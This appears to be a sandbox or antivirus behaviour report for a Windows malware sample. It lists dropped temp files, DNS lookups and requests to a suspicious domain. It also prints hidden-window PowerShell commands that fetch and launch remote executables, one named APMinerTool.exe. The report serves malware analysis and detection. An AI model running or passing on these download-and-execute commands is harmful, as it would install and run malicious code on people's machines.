Техническая информация
- %TEMP%\ixp000.tmp\oxesflsx.dat
- %TEMP%\ixp000.tmp\opzzaku
- %TEMP%\ixp000.tmp\bit2876.tmp
- %TEMP%\ixp000.tmp\bit2887.tmp
- %TEMP%\ixp000.tmp\bit2876.tmp
- %TEMP%\ixp000.tmp\bit2887.tmp
- %TEMP%\ixp000.tmp\opzzaku
- %TEMP%\ixp000.tmp\oxesflsx.dat
- %TEMP%\ixp000.tmp\hl.exe
- %TEMP%\ixp000.tmp\jbij.exe
- %TEMP%\ixp000.tmp\bit2876.tmp в %TEMP%\ixp000.tmp\jbij.exe
- %TEMP%\ixp000.tmp\bit2887.tmp в %TEMP%\ixp000.tmp\hl.exe
- 'microsoft.com':80
- 'si##i.am':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://si##i.am/origin/APMinerTool.exe
- http://si##i.am/lereload/urus.exe
- DNS ASK microsoft.com
- DNS ASK si##i.am
- DNS ASK public-trust.com
- '%TEMP%\ixp000.tmp\jbij.exe'
- '%TEMP%\ixp000.tmp\hl.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://sindi.am/origin/APMinerTool.exe,http://sindi.am/lereload/urus.exe -Destination JBij.exe,HL.exe;' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process JBij.exe; Start-Process HL.exe;' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command Start-Process JBij.exe; Start-Process HL.exe;